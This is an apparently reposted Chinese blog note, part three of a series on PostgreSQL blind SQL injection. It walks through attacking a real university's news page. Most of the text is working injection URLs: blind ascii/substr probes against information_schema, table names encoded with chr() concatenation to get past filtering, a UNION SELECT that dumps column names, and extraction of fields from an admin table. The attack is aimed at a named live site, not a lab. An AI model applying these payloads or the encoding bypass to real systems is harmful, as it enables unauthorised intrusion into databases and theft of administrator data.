语句我们是对的
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072+and+(select+ascii(substr(column_name,1,1))+from+information_schema.columns+where+table_name= publish_admin +between+0+and+256
但是为什么回出错呢??在百思不得其解中,我想到了不是有工具吗???我们用工具抓包下 看看 人家的是什么语句
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072+and+(select+ascii(substr(column_name,1,1))+from+information_schema.columns+where+table_name=chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(115)||chr(104)||chr(95)||chr(97)||chr(100)||chr(109)||chr(105)||chr(110)+limit+1+OFFSET+1)+between+0+and+256
正确、、、、、、醉了、、、、大家看大没、、、、
table_name= publish_admin
table_name=chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(115)||chr(104)||chr(95)||chr(97)||chr(100)||chr(109)||chr(105)||chr(110)
绕过去了、、出来了 、、 这就是爆字段的语句、、、
我们来继续看看 怎么爆、、字段的内容、、、其实还是可以这样的:
http://www.u-tokyo.ac.jp/news/detail_e.html?id=0+union+select+null,version(),1,version(),version(),version(),null,version(),version(),version(),null,null,version(),version(),column_name+from+information_schema.columns+where+table_name=chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(115)||chr(104)||chr(95)||chr(97)||chr(100)||chr(109)||chr(105)||chr(110)+limit+1+offset+0+--+
不过这不是我们今天的目的
不过最后还是搞定~~
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072+and+(select+ascii(substr(rank,1,1))+from+publish_admin+limit+1+OFFSET+0)+between+0+and+236
本文始发于微信公众号(飓风网络安全):PostgreSQL盲注笔记三
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论